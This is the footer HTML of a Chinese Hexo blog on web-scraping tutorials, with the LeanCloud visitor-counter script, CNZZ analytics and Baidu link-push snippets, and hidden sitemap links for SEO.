2025 <a href="https://cuiqingcai.com/sitemap.xml" style="display:none" title="爬虫教程" target="_blank">爬虫教程</a> <a href="https://cuiqingcai.com/sitemap.html" style="display:none" title="爬虫教程" target="_blank">爬虫教程</a> | 3.3m | 49:35 </div> <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动 </div> <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">京ICP备18015597号-1 </a> </div> <script> (function () { function leancloudSelector(url) { url = encodeURI(url); return document.getElementById(url).querySelector('.leancloud-visitors-count'); } function addCount(Counter) { var visitors = document.querySelector('.leancloud_visitors'); var url = decodeURI(visitors.id); var title = visitors.dataset.flagTitle; Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify( { url }))).then(response => response.json()).then(( { results }) => { if (results.length > 0) { var counter = results[0]; leancloudSelector(url).innerText = counter.time + 1; Counter('put', '/classes/Counter/' + counter.objectId, { time: { '__op': 'Increment', 'amount': 1 } }).catch(error => { console.error('Failed to save visitor count', error); }); } else { Counter('post', '/classes/Counter', { title, url, time: 1 }).then(response => response.json()).then(() => { leancloudSelector(url).innerText = 1; }).catch(error => { console.error('Failed to create', error); }); } }).catch(error => { console.error('LeanCloud Counter Error', error); }); } function showTime(Counter) { var visitors = document.querySelectorAll('.leancloud_visitors'); var entries = [...visitors].map(element => { return decodeURI(element.id); }); Counter('get', '/classes/Counter?where=' + encodeURIComponent(JSON.stringify( { url: { '$in': entries } }))).then(response => response.json()).then(( { results }) => { for (let url of entries) { let target = results.find(item => item.url === url); leancloudSelector(url).innerText = target ? target.time : 0; } }).catch(error => { console.error('LeanCloud Counter Error', error); }); } let { app_id, app_key, server_url } = { "enable": true, "app_id": "6X5dRQ0pnPWJgYy8SXOg0uID-gzGzoHsz", "app_key": "ziLDVEy73ne5HtFTiGstzHMS", "server_url": "https://6x5drq0p.lc-cn-n1-shared.com", "security": false }; function fetchData(api_server) { var Counter = (method, url, data) => { return fetch(`${api_server}/1.1${url}`, { method, headers: { 'X-LC-Id': app_id, 'X-LC-Key': app_key, 'Content-Type': 'application/json', }, body: JSON.stringify(data) }); }; if (CONFIG.page.isPost) { if (CONFIG.hostname !== location.hostname) return; addCount(Counter); } else if (document.querySelectorAll('.post-title-link').length >= 1) { showTime(Counter); } } let api_server = app_id.slice(-9) !== '-MdYXbMMI' ? server_url : `https://${app_id.slice(0, 8).toLowerCase()}.api.lncldglobal.com`; if (api_server) { fetchData(api_server); } else { fetch('https://app-router.leancloud.cn/2/route?appId=' + app_id).then(response => response.json()).then(( { api_server }) => { fetchData('https://' + api_server); }); } })(); </script> </div> <div class="footer-stat"> <script type="text/javascript">document.write(unescape("%3Cspan id='cnzz_stat_icon_1279355174'%3E%3C/span%3E%3Cscript src='https://v1.cnzz.com/z_stat.php%3Fid%3D1279355174%26online%3D1%26show%3Dline' type='text/javascript'%3E%3C/script%3E"));</script> </div> </footer> </div> <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script> <script src="//cdn.jsdelivr.net/npm/pangu@4/dist/browser/pangu.min.js"></script> <script src="/js/utils.js"></script> <script src="/.js"></script> <script src="/js/schemes/pisces.js"></script> <script src="/.js"></script> <script src="/js/next-boot.js"></script> <script src="/.js"></script> <script> (function () { var canonicalURL, curProtocol; //Get the <link> tag var x = document.getElementsByTagName("link"); //Find the last canonical URL if (x.length > 0) { for (i = 0; i < x.length; i++) { if (x[i].rel.toLowerCase() == 'canonical' && x[i].href) { canonicalURL = x[i].href; } } } //Get protocol if (!canonicalURL) { curProtocol = window.location.protocol.split(':')[0]; } else { curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL ! function () { var e = /([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi, r = canonicalURL, t = document.referrer; if (!e.test(r)) { var n = (String(curProtocol).toLowerCase() === 'https') ? "https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif" : "//api.share.baidu.com/s.gif"; t ? (n += "?r=" + encodeURIComponent(document.referrer), r && (n += "&l=" + r)) : r && (n += "?l=" + r); var i = new Image; i.src = n } }(window); })(); </script> <script src="/js/local-search.js"></script> <script src="/.js"></script> </body> </html>